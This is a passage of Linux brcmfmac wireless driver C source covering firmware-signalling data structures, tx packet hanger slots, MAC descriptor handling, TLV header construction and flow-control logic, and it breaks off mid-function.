 * @BRCMF_FWS_FIFO_COUNT: number of fifos.
 */
enum brcmf_fws_fifo {
	BRCMF_FWS_FIFO_FIRST,
	BRCMF_FWS_FIFO_AC_BK = BRCMF_FWS_FIFO_FIRST,
	BRCMF_FWS_FIFO_AC_BE,
	BRCMF_FWS_FIFO_AC_VI,
	BRCMF_FWS_FIFO_AC_VO,
	BRCMF_FWS_FIFO_BCMC,
	BRCMF_FWS_FIFO_ATIM,
	BRCMF_FWS_FIFO_COUNT
};

/**
 * enum brcmf_fws_txstatus - txstatus flag values.
 *
 * @BRCMF_FWS_TXSTATUS_DISCARD:
 *	host is free to discard the packet.
 * @BRCMF_FWS_TXSTATUS_CORE_SUPPRESS:
 *	802.11 core suppressed the packet.
 * @BRCMF_FWS_TXSTATUS_FW_PS_SUPPRESS:
 *	firmware suppress the packet as device is already in PS mode.
 * @BRCMF_FWS_TXSTATUS_FW_TOSSED:
 *	firmware tossed the packet.
 * @BRCMF_FWS_TXSTATUS_HOST_TOSSED:
 *	host tossed the packet.
 */
enum brcmf_fws_txstatus {
	BRCMF_FWS_TXSTATUS_DISCARD,
	BRCMF_FWS_TXSTATUS_CORE_SUPPRESS,
	BRCMF_FWS_TXSTATUS_FW_PS_SUPPRESS,
	BRCMF_FWS_TXSTATUS_FW_TOSSED,
	BRCMF_FWS_TXSTATUS_HOST_TOSSED
};

/* flow-control mode: none, credit implied by txstatus, or explicit credits */
enum brcmf_fws_fcmode {
	BRCMF_FWS_FCMODE_NONE,
	BRCMF_FWS_FCMODE_IMPLIED_CREDIT,
	BRCMF_FWS_FCMODE_EXPLICIT_CREDIT
};

enum brcmf_fws_mac_desc_state {
	BRCMF_FWS_STATE_OPEN = 1,
	BRCMF_FWS_STATE_CLOSE
};

/**
 * struct brcmf_fws_mac_descriptor - firmware signalling data per node/interface
 *
 * @name: printable identifier built by brcmf_fws_macdesc_set_name().
 * @occupied: slot is in use.
 * @mac_handle: handle for mac entry determined by firmware.
 * @interface_id: interface index.
 * @state: current state.
 * @suppressed: mac entry is suppressed.
 * @generation: generation bit.
 * @ac_bitmap: ac queue bitmap.
 * @requested_credit: credits requested by firmware.
 * @requested_packet: packets requested by firmware.
 * @ea: ethernet address.
 * @seq: per-node free-running sequence.
 * @psq: power-save queue.
 * @transit_count: packet in transit to firmware.
 * @suppr_transit_count: suppressed packets still in transit to firmware.
 * @send_tim_signal: TIM (pending-traffic) update must be sent to firmware.
 * @traffic_pending_bmp: per-fifo bitmap of pending traffic.
 * @traffic_lastreported_bmp: pending-traffic bitmap last sent to firmware.
 */
struct brcmf_fws_mac_descriptor {
	char name[16];
	u8 occupied;
	u8 mac_handle;
	u8 interface_id;
	u8 state;
	bool suppressed;
	u8 generation;
	u8 ac_bitmap;
	u8 requested_credit;
	u8 requested_packet;
	u8 ea[ETH_ALEN];
	u8 seq[BRCMF_FWS_FIFO_COUNT];
	struct pktq psq;
	int transit_count;
	int suppr_transit_count;
	bool send_tim_signal;
	u8 traffic_pending_bmp;
	u8 traffic_lastreported_bmp;
};

#define BRCMF_FWS_HANGER_MAXITEMS	1024

/**
 * enum brcmf_fws_hanger_item_state - state of hanger item.
 *
 * @BRCMF_FWS_HANGER_ITEM_STATE_FREE: item is free for use.
 * @BRCMF_FWS_HANGER_ITEM_STATE_INUSE: item is in use.
 * @BRCMF_FWS_HANGER_ITEM_STATE_INUSE_SUPPRESSED: item was suppressed.
 */
enum brcmf_fws_hanger_item_state {
	BRCMF_FWS_HANGER_ITEM_STATE_FREE = 1,
	BRCMF_FWS_HANGER_ITEM_STATE_INUSE,
	BRCMF_FWS_HANGER_ITEM_STATE_INUSE_SUPPRESSED
};

/**
 * struct brcmf_fws_hanger_item - single entry for tx pending packet.
 *
 * @state: entry is either free or occupied.
 * @pkt: packet itself.
 */
struct brcmf_fws_hanger_item {
	enum brcmf_fws_hanger_item_state state;
	struct sk_buff *pkt;
};

/**
 * struct brcmf_fws_hanger - holds packets awaiting firmware txstatus.
 *
 * @pushed: packets pushed to await txstatus.
 * @popped: packets popped upon handling txstatus.
 * @failed_to_push: packets that could not be pushed.
 * @failed_to_pop: packets that could not be popped.
 * @failed_slotfind: packets for which failed to find an entry.
 * @slot_pos: last returned item index for a free entry.
 * @items: array of hanger items.
 */
struct brcmf_fws_hanger {
	u32 pushed;
	u32 popped;
	u32 failed_to_push;
	u32 failed_to_pop;
	u32 failed_slotfind;
	u32 slot_pos;
	struct brcmf_fws_hanger_item items[BRCMF_FWS_HANGER_MAXITEMS];
};

/* descriptor storage: per-node entries, per-interface entries and a
 * catch-all "other" entry used when no specific descriptor matches.
 */
struct brcmf_fws_macdesc_table {
	struct brcmf_fws_mac_descriptor nodes[BRCMF_FWS_MAC_DESC_TABLE_SIZE];
	struct brcmf_fws_mac_descriptor iface[BRCMF_MAX_IFS];
	struct brcmf_fws_mac_descriptor other;
};

/* event/error counters maintained throughout this file */
struct brcmf_fws_stats {
	u32 tlv_parse_failed;
	u32 tlv_invalid_type;
	u32 header_only_pkt;
	u32 header_pulls;
	u32 pkt2bus;
	u32 send_pkts[5];
	u32 requested_sent[5];
	u32 generic_error;
	u32 mac_update_failed;
	u32 mac_ps_update_failed;
	u32 if_update_failed;
	u32 packet_request_failed;
	u32 credit_request_failed;
	u32 rollback_success;
	u32 rollback_failed;
	u32 delayq_full_error;
	u32 supprq_full_error;
	u32 txs_indicate;
	u32 txs_discard;
	u32 txs_supp_core;
	u32 txs_supp_ps;
	u32 txs_tossed;
	u32 txs_host_tossed;
	u32 bus_flow_block;
	u32 fws_flow_block;
};

/* central firmware-signalling state, protected by @spinlock */
struct brcmf_fws_info {
	struct brcmf_pub *drvr;
	spinlock_t spinlock;
	ulong flags;
	struct brcmf_fws_stats stats;
	struct brcmf_fws_hanger hanger;
	enum brcmf_fws_fcmode fcmode;
	bool fw_signals;
	bool bcmc_credit_check;
	struct brcmf_fws_macdesc_table desc;
	struct workqueue_struct *fws_wq;
	struct work_struct fws_dequeue_work;
	u32 fifo_enqpkt[BRCMF_FWS_FIFO_COUNT];
	int fifo_credit[BRCMF_FWS_FIFO_COUNT];
	int credits_borrowed[BRCMF_FWS_FIFO_AC_VO + 1];
	int deq_node_pos[BRCMF_FWS_FIFO_COUNT];
	u32 fifo_credit_map;
	u32 fifo_delay_map;
	unsigned long borrow_defer_timestamp;
	bool bus_flow_blocked;
	bool creditmap_received;
	u8 mode;
	bool avoid_queueing;
};

/*
 * brcmf_fws_prio2fifo - mapping from 802.1d priority to firmware fifo index.
 */
static const int brcmf_fws_prio2fifo[] = {
	BRCMF_FWS_FIFO_AC_BE,
	BRCMF_FWS_FIFO_AC_BK,
	BRCMF_FWS_FIFO_AC_BK,
	BRCMF_FWS_FIFO_AC_BE,
	BRCMF_FWS_FIFO_AC_VI,
	BRCMF_FWS_FIFO_AC_VI,
	BRCMF_FWS_FIFO_AC_VO,
	BRCMF_FWS_FIFO_AC_VO
};

static int fcmode;
module_param(fcmode, int, S_IRUSR);
MODULE_PARM_DESC(fcmode, "mode of firmware signalled flow control");

#define BRCMF_FWS_TLV_DEF(name, id, len) \
	case BRCMF_FWS_TYPE_ ## name: \
		return len;

/**
 * brcmf_fws_get_tlv_len() - returns defined length for given tlv id.
 *
 * @fws: firmware-signalling information.
 * @id: identifier of the TLV.
 *
 * Return: the specified length for the given TLV; Otherwise -EINVAL.
 */
static int brcmf_fws_get_tlv_len(struct brcmf_fws_info *fws,
				 enum brcmf_fws_tlv_type id)
{
	switch (id) {
	BRCMF_FWS_TLV_DEFLIST
	default:
		fws->stats.tlv_invalid_type++;
		break;
	}
	return -EINVAL;
}
#undef BRCMF_FWS_TLV_DEF

/* irqsave lock/unlock; saved irq flags live in fws->flags */
static void brcmf_fws_lock(struct brcmf_fws_info *fws)
		__acquires(&fws->spinlock)
{
	spin_lock_irqsave(&fws->spinlock, fws->flags);
}

static void brcmf_fws_unlock(struct brcmf_fws_info *fws)
		__releases(&fws->spinlock)
{
	spin_unlock_irqrestore(&fws->spinlock, fws->flags);
}

/* match callback: true when skb belongs to the given interface index */
static bool brcmf_fws_ifidx_match(struct sk_buff *skb, void *arg)
{
	u32 ifidx = brcmf_skb_if_flags_get_field(skb, INDEX);
	return ifidx == *(int *)arg;
}

/* free all packets on a psq, optionally only those of one interface */
static void brcmf_fws_psq_flush(struct brcmf_fws_info *fws, struct pktq *q,
				int ifidx)
{
	bool (*matchfn)(struct sk_buff *, void *) = NULL;
	struct sk_buff *skb;
	int prec;

	if (ifidx != -1)
		matchfn = brcmf_fws_ifidx_match;
	for (prec = 0; prec < q->num_prec; prec++) {
		skb = brcmu_pktq_pdeq_match(q, prec, matchfn, &ifidx);
		while (skb) {
			brcmu_pkt_buf_free_skb(skb);
			skb = brcmu_pktq_pdeq_match(q, prec, matchfn, &ifidx);
		}
	}
}

/* reset the hanger: zero counters and mark every slot free */
static void brcmf_fws_hanger_init(struct brcmf_fws_hanger *hanger)
{
	int i;
	memset(hanger, 0, sizeof(*hanger));
	for (i = 0; i < ARRAY_SIZE(hanger->items); i++)
		hanger->items[i].state = BRCMF_FWS_HANGER_ITEM_STATE_FREE;
}

/* find a free slot, scanning circularly from the last position;
 * returns BRCMF_FWS_HANGER_MAXITEMS when all slots are occupied.
 */
static u32 brcmf_fws_hanger_get_free_slot(struct brcmf_fws_hanger *h)
{
	u32 i;

	i = (h->slot_pos + 1) % BRCMF_FWS_HANGER_MAXITEMS;

	while (i != h->slot_pos) {
		if (h->items[i].state == BRCMF_FWS_HANGER_ITEM_STATE_FREE) {
			h->slot_pos = i;
			goto done;
		}
		i++;
		if (i == BRCMF_FWS_HANGER_MAXITEMS)
			i = 0;
	}
	brcmf_err("all slots occupied\n");
	h->failed_slotfind++;
	i = BRCMF_FWS_HANGER_MAXITEMS;
done:
	return i;
}

/* park a tx packet in the given slot until its txstatus arrives */
static int brcmf_fws_hanger_pushpkt(struct brcmf_fws_hanger *h,
				    struct sk_buff *pkt, u32 slot_id)
{
	if (slot_id >= BRCMF_FWS_HANGER_MAXITEMS)
		return -ENOENT;

	if (h->items[slot_id].state != BRCMF_FWS_HANGER_ITEM_STATE_FREE) {
		brcmf_err("slot is not free\n");
		h->failed_to_push++;
		return -EINVAL;
	}

	h->items[slot_id].state = BRCMF_FWS_HANGER_ITEM_STATE_INUSE;
	h->items[slot_id].pkt = pkt;
	h->pushed++;
	return 0;
}

/* retrieve the packet in a slot; frees the slot when remove_item is set */
static inline int brcmf_fws_hanger_poppkt(struct brcmf_fws_hanger *h,
					  u32 slot_id, struct sk_buff **pktout,
					  bool remove_item)
{
	if (slot_id >= BRCMF_FWS_HANGER_MAXITEMS)
		return -ENOENT;

	if (h->items[slot_id].state == BRCMF_FWS_HANGER_ITEM_STATE_FREE) {
		brcmf_err("entry not in use\n");
		h->failed_to_pop++;
		return -EINVAL;
	}

	*pktout = h->items[slot_id].pkt;
	if (remove_item) {
		h->items[slot_id].state = BRCMF_FWS_HANGER_ITEM_STATE_FREE;
		h->items[slot_id].pkt = NULL;
		h->popped++;
	}
	return 0;
}

/* flag an in-use slot as holding a firmware-suppressed packet */
static int brcmf_fws_hanger_mark_suppressed(struct brcmf_fws_hanger *h,
					    u32 slot_id)
{
	if (slot_id >= BRCMF_FWS_HANGER_MAXITEMS)
		return -ENOENT;

	if (h->items[slot_id].state == BRCMF_FWS_HANGER_ITEM_STATE_FREE) {
		brcmf_err("entry not in use\n");
		return -EINVAL;
	}

	h->items[slot_id].state = BRCMF_FWS_HANGER_ITEM_STATE_INUSE_SUPPRESSED;
	return 0;
}

/* release matching hanger entries; frees non-suppressed packets */
static void brcmf_fws_hanger_cleanup(struct brcmf_fws_info *fws,
				     bool (*fn)(struct sk_buff *, void *),
				     int ifidx)
{
	struct brcmf_fws_hanger *h = &fws->hanger;
	struct sk_buff *skb;
	int i;
	enum
	brcmf_fws_hanger_item_state s;

	for (i = 0; i < ARRAY_SIZE(h->items); i++) {
		s = h->items[i].state;
		if (s == BRCMF_FWS_HANGER_ITEM_STATE_INUSE ||
		    s == BRCMF_FWS_HANGER_ITEM_STATE_INUSE_SUPPRESSED) {
			skb = h->items[i].pkt;
			if (fn == NULL || fn(skb, &ifidx)) {
				/* suppress packets freed from psq */
				if (s == BRCMF_FWS_HANGER_ITEM_STATE_INUSE)
					brcmu_pkt_buf_free_skb(skb);
				h->items[i].state =
					BRCMF_FWS_HANGER_ITEM_STATE_FREE;
			}
		}
	}
}

/* build a human-readable name for a descriptor (for trace output) */
static void brcmf_fws_macdesc_set_name(struct brcmf_fws_info *fws,
				       struct brcmf_fws_mac_descriptor *desc)
{
	if (desc == &fws->desc.other)
		strlcpy(desc->name, "MAC-OTHER", sizeof(desc->name));
	else if (desc->mac_handle)
		scnprintf(desc->name, sizeof(desc->name), "MAC-%d:%d",
			  desc->mac_handle, desc->interface_id);
	else
		scnprintf(desc->name, sizeof(desc->name), "MACIF:%d",
			  desc->interface_id);
}

/* (re)initialize a descriptor as open, with no outstanding requests */
static void brcmf_fws_macdesc_init(struct brcmf_fws_mac_descriptor *desc,
				   u8 *addr, u8 ifidx)
{
	brcmf_dbg(TRACE,
		  "enter: desc %p ea=%pM, ifidx=%u\n", desc, addr, ifidx);
	desc->occupied = 1;
	desc->state = BRCMF_FWS_STATE_OPEN;
	desc->requested_credit = 0;
	desc->requested_packet = 0;
	/* depending on use may need ifp->bssidx instead */
	desc->interface_id = ifidx;
	desc->ac_bitmap = 0xff; /* update this when handling APSD */
	if (addr)
		memcpy(&desc->ea[0], addr, ETH_ALEN);
}

/* mark a descriptor unused and closed */
static
void brcmf_fws_macdesc_deinit(struct brcmf_fws_mac_descriptor *desc)
{
	brcmf_dbg(TRACE,
		  "enter: ea=%pM, ifidx=%u\n", desc->ea, desc->interface_id);
	desc->occupied = 0;
	desc->state = BRCMF_FWS_STATE_CLOSE;
	desc->requested_credit = 0;
	desc->requested_packet = 0;
}

/* look up an occupied node descriptor by ethernet address */
static struct brcmf_fws_mac_descriptor *
brcmf_fws_macdesc_lookup(struct brcmf_fws_info *fws, u8 *ea)
{
	struct brcmf_fws_mac_descriptor *entry;
	int i;

	if (ea == NULL)
		return ERR_PTR(-EINVAL);

	entry = &fws->desc.nodes[0];
	for (i = 0; i < ARRAY_SIZE(fws->desc.nodes); i++) {
		if (entry->occupied && !memcmp(entry->ea, ea, ETH_ALEN))
			return entry;
		entry++;
	}

	return ERR_PTR(-ENOENT);
}

static struct brcmf_fws_mac_descriptor*
brcmf_fws_macdesc_find(struct brcmf_fws_info *fws, struct brcmf_if *ifp, u8 *da)
{
	struct brcmf_fws_mac_descriptor *entry = &fws->desc.other;
	bool multicast;

	multicast = is_multicast_ether_addr(da);

	/* Multicast destination, STA and P2P clients get the interface entry.
	 * STA/GC gets the Mac Entry for TDLS destinations, TDLS destinations
	 * have their own entry.
	 */
	if (multicast && ifp->fws_desc) {
		entry = ifp->fws_desc;
		goto done;
	}

	/* unicast: prefer a per-node entry, fall back to the interface one */
	entry = brcmf_fws_macdesc_lookup(fws, da);
	if (IS_ERR(entry))
		entry = ifp->fws_desc;

done:
	return entry;
}

/* decide whether traffic for this descriptor/fifo must stay queued */
static bool brcmf_fws_macdesc_closed(struct brcmf_fws_info *fws,
				     struct brcmf_fws_mac_descriptor *entry,
				     int fifo)
{
	struct brcmf_fws_mac_descriptor *if_entry;
	bool closed;

	/* for unique destination entries the related interface
	 * may be closed.
	 */
	if (entry->mac_handle) {
		if_entry = &fws->desc.iface[entry->interface_id];
		if (if_entry->state == BRCMF_FWS_STATE_CLOSE)
			return true;
	}
	/* an entry is closed when the state is closed and
	 * the firmware did not request anything.
	 */
	closed = entry->state == BRCMF_FWS_STATE_CLOSE &&
		 !entry->requested_credit && !entry->requested_packet;

	/* Or firmware does not allow traffic for given fifo */
	return closed || !(entry->ac_bitmap & BIT(fifo));
}

/* flush a descriptor's psq for one interface (or all when ifidx == -1) */
static void brcmf_fws_macdesc_cleanup(struct brcmf_fws_info *fws,
				      struct brcmf_fws_mac_descriptor *entry,
				      int ifidx)
{
	if (entry->occupied && (ifidx == -1 || ifidx == entry->interface_id)) {
		brcmf_fws_psq_flush(fws, &entry->psq, ifidx);
		entry->occupied = !!(entry->psq.len);
	}
}

/* drop matching packets still sitting in the bus tx queue and release
 * their hanger slots.
 */
static void brcmf_fws_bus_txq_cleanup(struct brcmf_fws_info *fws,
				      bool (*fn)(struct sk_buff *, void *),
				      int ifidx)
{
	struct brcmf_fws_hanger_item *hi;
	struct pktq *txq;
	struct sk_buff *skb;
	int prec;
	u32 hslot;

	txq = brcmf_bus_gettxq(fws->drvr->bus_if);
	if (IS_ERR(txq)) {
		brcmf_dbg(TRACE, "no txq to clean up\n");
		return;
	}

	for (prec = 0; prec < txq->num_prec; prec++) {
		skb = brcmu_pktq_pdeq_match(txq, prec, fn, &ifidx);
		while (skb) {
			hslot = brcmf_skb_htod_tag_get_field(skb, HSLOT);
			hi = &fws->hanger.items[hslot];
			WARN_ON(skb != hi->pkt);
			hi->state = BRCMF_FWS_HANGER_ITEM_STATE_FREE;
			brcmu_pkt_buf_free_skb(skb);
			skb = brcmu_pktq_pdeq_match(txq, prec, fn, &ifidx);
		}
	}
}

/* full cleanup for one interface (or everything when ifidx == -1):
 * node/other descriptors, bus tx queue and hanger.
 */
static void brcmf_fws_cleanup(struct brcmf_fws_info *fws, int ifidx)
{
	int i;
	struct brcmf_fws_mac_descriptor *table;
	bool (*matchfn)(struct sk_buff *, void *) = NULL;

	if (fws == NULL)
		return;

	if (ifidx != -1)
		matchfn = brcmf_fws_ifidx_match;

	/* cleanup individual nodes */
	table = &fws->desc.nodes[0];
	for (i = 0; i < ARRAY_SIZE(fws->desc.nodes); i++)
		brcmf_fws_macdesc_cleanup(fws, &table[i], ifidx);

	brcmf_fws_macdesc_cleanup(fws, &fws->desc.other, ifidx);
	brcmf_fws_bus_txq_cleanup(fws, matchfn, ifidx);
	brcmf_fws_hanger_cleanup(fws, matchfn, ifidx);
}

/* push the PKTTAG (and optional seq/TIM) TLV header onto an outgoing
 * skb; returns the resulting data offset in 4-byte words.
 */
static u8 brcmf_fws_hdrpush(struct brcmf_fws_info *fws, struct sk_buff *skb)
{
	struct brcmf_fws_mac_descriptor *entry = brcmf_skbcb(skb)->mac;
	u8 *wlh;
	u16 data_offset = 0;
	u8 fillers;
	__le32 pkttag = cpu_to_le32(brcmf_skbcb(skb)->htod);
	__le16 pktseq =
	cpu_to_le16(brcmf_skbcb(skb)->htod_seq);

	brcmf_dbg(TRACE, "enter: %s, idx=%d hslot=%d htod %X seq %X\n",
		  entry->name, brcmf_skb_if_flags_get_field(skb, INDEX),
		  (le32_to_cpu(pkttag) >> 8) & 0xffff,
		  brcmf_skbcb(skb)->htod, brcmf_skbcb(skb)->htod_seq);
	if (entry->send_tim_signal)
		data_offset += 2 + BRCMF_FWS_TYPE_PENDING_TRAFFIC_BMP_LEN;
	if (BRCMF_FWS_MODE_GET_REUSESEQ(fws->mode))
		data_offset += BRCMF_FWS_TYPE_SEQ_LEN;
	/* +2 is for Type[1] and Len[1] in TLV, plus TIM signal */
	data_offset += 2 + BRCMF_FWS_TYPE_PKTTAG_LEN;
	/* pad the header out to a 4-byte multiple with FILLER bytes */
	fillers = round_up(data_offset, 4) - data_offset;
	data_offset += fillers;

	skb_push(skb, data_offset);
	wlh = skb->data;

	wlh[0] = BRCMF_FWS_TYPE_PKTTAG;
	wlh[1] = BRCMF_FWS_TYPE_PKTTAG_LEN;
	memcpy(&wlh[2], &pkttag, sizeof(pkttag));
	if (BRCMF_FWS_MODE_GET_REUSESEQ(fws->mode)) {
		wlh[1] += BRCMF_FWS_TYPE_SEQ_LEN;
		memcpy(&wlh[2 + BRCMF_FWS_TYPE_PKTTAG_LEN], &pktseq,
		       sizeof(pktseq));
	}
	wlh += wlh[1] + 2;

	if (entry->send_tim_signal) {
		entry->send_tim_signal = 0;
		wlh[0] = BRCMF_FWS_TYPE_PENDING_TRAFFIC_BMP;
		wlh[1] = BRCMF_FWS_TYPE_PENDING_TRAFFIC_BMP_LEN;
		wlh[2] = entry->mac_handle;
		wlh[3] = entry->traffic_pending_bmp;
		brcmf_dbg(TRACE, "adding TIM info: handle %d bmp 0x%X\n",
			  entry->mac_handle, entry->traffic_pending_bmp);
		wlh += BRCMF_FWS_TYPE_PENDING_TRAFFIC_BMP_LEN + 2;
		entry->traffic_lastreported_bmp = entry->traffic_pending_bmp;
	}
	if (fillers)
		memset(wlh, BRCMF_FWS_TYPE_FILLER, fillers);

	return (u8)(data_offset >> 2);
}

/* recompute the pending-traffic bitmap for one fifo and, when requested
 * and the entry is closed, push the update to firmware via a dummy
 * signalling-only packet; returns true when such a packet was sent.
 */
static bool brcmf_fws_tim_update(struct brcmf_fws_info *fws,
				 struct brcmf_fws_mac_descriptor *entry,
				 int fifo, bool send_immediately)
{
	struct sk_buff *skb;
	struct brcmf_skbuff_cb *skcb;
	s32 err;
	u32 len;
	u8 data_offset;
	int ifidx;

	/* check delayedQ and suppressQ in one call using bitmap */
	if (brcmu_pktq_mlen(&entry->psq, 3 << (fifo * 2)) == 0)
		entry->traffic_pending_bmp &= ~NBITVAL(fifo);
	else
		entry->traffic_pending_bmp |= NBITVAL(fifo);

	entry->send_tim_signal = false;
	if (entry->traffic_lastreported_bmp != entry->traffic_pending_bmp)
		entry->send_tim_signal = true;
	if (send_immediately && entry->send_tim_signal &&
	    entry->state == BRCMF_FWS_STATE_CLOSE) {
		/* create a dummy packet and sent that. The traffic */
		/* bitmap info will automatically be attached to that packet */
		len = BRCMF_FWS_TYPE_PKTTAG_LEN + 2 +
		      BRCMF_FWS_TYPE_SEQ_LEN +
		      BRCMF_FWS_TYPE_PENDING_TRAFFIC_BMP_LEN + 2 +
		      4 + fws->drvr->hdrlen;
		skb = brcmu_pkt_buf_get_skb(len);
		if (skb == NULL)
			return false;
		skb_pull(skb, len);
		skcb = brcmf_skbcb(skb);
		skcb->mac = entry;
		skcb->state = BRCMF_FWS_SKBSTATE_TIM;
		skcb->htod = 0;
		skcb->htod_seq = 0;
		data_offset = brcmf_fws_hdrpush(fws, skb);
		ifidx = brcmf_skb_if_flags_get_field(skb, INDEX);
		/* drop the lock around the proto call to avoid holding it
		 * across the bus transmit path
		 */
		brcmf_fws_unlock(fws);
		err = brcmf_proto_txdata(fws->drvr, ifidx, data_offset, skb);
		brcmf_fws_lock(fws);
		if (err)
			brcmu_pkt_buf_free_skb(skb);
		return true;
	}
	return false;
}

/* apply netif flow control based on psq fill level vs. the watermarks */
static void
brcmf_fws_flow_control_check(struct brcmf_fws_info *fws, struct pktq *pq,
			     u8 if_id)
{
	struct brcmf_if *ifp = brcmf_get_ifp(fws->drvr, if_id);

	if (WARN_ON(!ifp))
		return;

	if ((ifp->netif_stop & BRCMF_NETIF_STOP_REASON_FWS_FC) &&
	    pq->len <= BRCMF_FWS_FLOWCONTROL_LOWATER)
		brcmf_txflowblock_if(ifp,
				     BRCMF_NETIF_STOP_REASON_FWS_FC, false);
	if (!(ifp->netif_stop & BRCMF_NETIF_STOP_REASON_FWS_FC) &&
	    pq->len >= BRCMF_FWS_FLOWCONTROL_HIWATER) {
		fws->stats.fws_flow_block++;
		brcmf_txflowblock_if(ifp, BRCMF_NETIF_STOP_REASON_FWS_FC, true);
	}
	return;
}

/* RSSI TLV from firmware: currently only logged */
static int brcmf_fws_rssi_indicate(struct brcmf_fws_info *fws, s8 rssi)
{
	brcmf_dbg(CTL, "rssi %d\n", rssi);
	return 0;
}

/* handle MACDESC_ADD/MACDESC_DEL TLVs: create, move or delete the
 * per-node descriptor selected by the firmware-assigned mac handle.
 */
static
int brcmf_fws_macdesc_indicate(struct brcmf_fws_info *fws, u8 type, u8 *data)
{
	struct brcmf_fws_mac_descriptor *entry, *existing;
	u8 mac_handle;
	u8 ifidx;
	u8 *addr;

	mac_handle = *data++;
	ifidx = *data++;
	addr = data;

	entry = &fws->desc.nodes[mac_handle & 0x1F];
	if (type == BRCMF_FWS_TYPE_MACDESC_DEL) {
		if (entry->occupied) {
			brcmf_dbg(TRACE, "deleting %s mac %pM\n",
				  entry->name, addr);
			brcmf_fws_lock(fws);
			brcmf_fws_macdesc_cleanup(fws, entry, -1);
			brcmf_fws_macdesc_deinit(entry);
			brcmf_fws_unlock(fws);
		} else
			fws->stats.mac_update_failed++;
		return 0;
	}

	/* ADD: check whether this station is already known under
	 * another descriptor slot.
	 */
	existing = brcmf_fws_macdesc_lookup(fws, addr);
	if (IS_ERR(existing)) {
		if (!entry->occupied) {
			brcmf_fws_lock(fws);
			entry->mac_handle = mac_handle;
			brcmf_fws_macdesc_init(entry, addr, ifidx);
			brcmf_fws_macdesc_set_name(fws, entry);
			brcmu_pktq_init(&entry->psq, BRCMF_FWS_PSQ_PREC_COUNT,
					BRCMF_FWS_PSQ_LEN);
			brcmf_fws_unlock(fws);
			brcmf_dbg(TRACE, "add %s mac %pM\n", entry->name, addr);
		} else {
			fws->stats.mac_update_failed++;
		}
	} else {
		if (entry != existing) {
			brcmf_dbg(TRACE, "copy mac %s\n", existing->name);
			brcmf_fws_lock(fws);
			/* copy descriptor fields up to (excluding) the psq;
			 * the destination keeps its own queue
			 */
			memcpy(entry, existing,
			       offsetof(struct brcmf_fws_mac_descriptor, psq));
			entry->mac_handle = mac_handle;
			brcmf_fws_macdesc_deinit(existing);
			brcmf_fws_macdesc_set_name(fws, entry);
			brcmf_fws_unlock(fws);
			brcmf_dbg(TRACE, "relocate %s mac %pM\n", entry->name,
				  addr);
		} else {
			brcmf_dbg(TRACE, "use existing\n");
			WARN_ON(entry->mac_handle != mac_handle);
			/* TODO: what should we do here: continue, reinit, ..
			 */
		}
	}
	return 0;
}

/* handle MAC_OPEN/MAC_CLOSE TLVs: toggle a node's power-save state and
 * push TIM updates when the node closes.
 */
static int brcmf_fws_macdesc_state_indicate(struct brcmf_fws_info *fws,
					    u8 type, u8 *data)
{
	struct brcmf_fws_mac_descriptor *entry;
	u8 mac_handle;
	int ret;

	mac_handle = data[0];
	entry = &fws->desc.nodes[mac_handle & 0x1F];
	if (!entry->occupied) {
		fws->stats.mac_ps_update_failed++;
		return -ESRCH;
	}
	brcmf_fws_lock(fws);
	/* a state update should wipe old credits */
	entry->requested_credit = 0;
	entry->requested_packet = 0;
	if (type == BRCMF_FWS_TYPE_MAC_OPEN) {
		entry->state = BRCMF_FWS_STATE_OPEN;
		ret = BRCMF_FWS_RET_OK_SCHEDULE;
	} else {
		entry->state = BRCMF_FWS_STATE_CLOSE;
		brcmf_fws_tim_update(fws, entry, BRCMF_FWS_FIFO_AC_BK, false);
		brcmf_fws_tim_update(fws, entry, BRCMF_FWS_FIFO_AC_BE, false);
		brcmf_fws_tim_update(fws, entry, BRCMF_FWS_FIFO_AC_VI, false);
		brcmf_fws_tim_update(fws, entry, BRCMF_FWS_FIFO_AC_VO, true);
		ret = BRCMF_FWS_RET_OK_NOSCHEDULE;
	}
	brcmf_fws_unlock(fws);
	return ret;
}

/* handle INTERFACE_OPEN/INTERFACE_CLOSE TLVs for an interface entry */
static int brcmf_fws_interface_state_indicate(struct brcmf_fws_info *fws,
					      u8 type, u8 *data)
{
	struct brcmf_fws_mac_descriptor *entry;
	u8 ifidx;
	int ret;

	ifidx = data[0];

	if (ifidx >= BRCMF_MAX_IFS) {
		ret = -ERANGE;
		goto fail;
	}

	entry = &fws->desc.iface[ifidx];
	if (!entry->occupied) {
		ret = -ESRCH;
		goto fail;
	}

	brcmf_dbg(TRACE, "%s (%d): %s\n", brcmf_fws_get_tlv_name(type), type,
		  entry->name);
	brcmf_fws_lock(fws);
	switch (type) {
	case BRCMF_FWS_TYPE_INTERFACE_OPEN:
		entry->state = BRCMF_FWS_STATE_OPEN;
		ret = BRCMF_FWS_RET_OK_SCHEDULE;
		break;
	case BRCMF_FWS_TYPE_INTERFACE_CLOSE:
		entry->state = BRCMF_FWS_STATE_CLOSE;
		ret = BRCMF_FWS_RET_OK_NOSCHEDULE;
		break;
	default:
		ret = -EINVAL;
		brcmf_fws_unlock(fws);
		goto fail;
	}
	brcmf_fws_unlock(fws);
	return ret;

fail:
	fws->stats.if_update_failed++;
	return ret;
}

/* handle MAC_REQUEST_CREDIT/MAC_REQUEST_PACKET TLVs: record how many
 * credits/packets the firmware wants for a (closed) node.
 */
static int brcmf_fws_request_indicate(struct brcmf_fws_info *fws, u8 type,
				      u8 *data)
{
	struct brcmf_fws_mac_descriptor *entry;

	entry = &fws->desc.nodes[data[1] & 0x1F];
	if (!entry->occupied) {
		if (type == BRCMF_FWS_TYPE_MAC_REQUEST_CREDIT)
			fws->stats.credit_request_failed++;
		else
			fws->stats.packet_request_failed++;
		return -ESRCH;
	}

	brcmf_dbg(TRACE, "%s (%d): %s cnt %d bmp %d\n",
		  brcmf_fws_get_tlv_name(type), type, entry->name,
		  data[0], data[2]);
	brcmf_fws_lock(fws);
	if (type == BRCMF_FWS_TYPE_MAC_REQUEST_CREDIT)
		entry->requested_credit = data[0];
	else
		entry->requested_packet = data[0];

	entry->ac_bitmap = data[2];
	brcmf_fws_unlock(fws);
	return BRCMF_FWS_RET_OK_SCHEDULE;
}

/* consume one firmware-requested credit/packet for this skb and flag
 * it accordingly in the skb's if_flags.
 */
static void
brcmf_fws_macdesc_use_req_credit(struct brcmf_fws_mac_descriptor *entry,
				 struct sk_buff *skb)
{
	if (entry->requested_credit > 0) {
		entry->requested_credit--;
		brcmf_skb_if_flags_set_field(skb, REQUESTED, 1);
		brcmf_skb_if_flags_set_field(skb, REQ_CREDIT, 1);
		if (entry->state != BRCMF_FWS_STATE_CLOSE)
			brcmf_err("requested credit set while mac not closed!\n");
	} else if (entry->requested_packet > 0) {
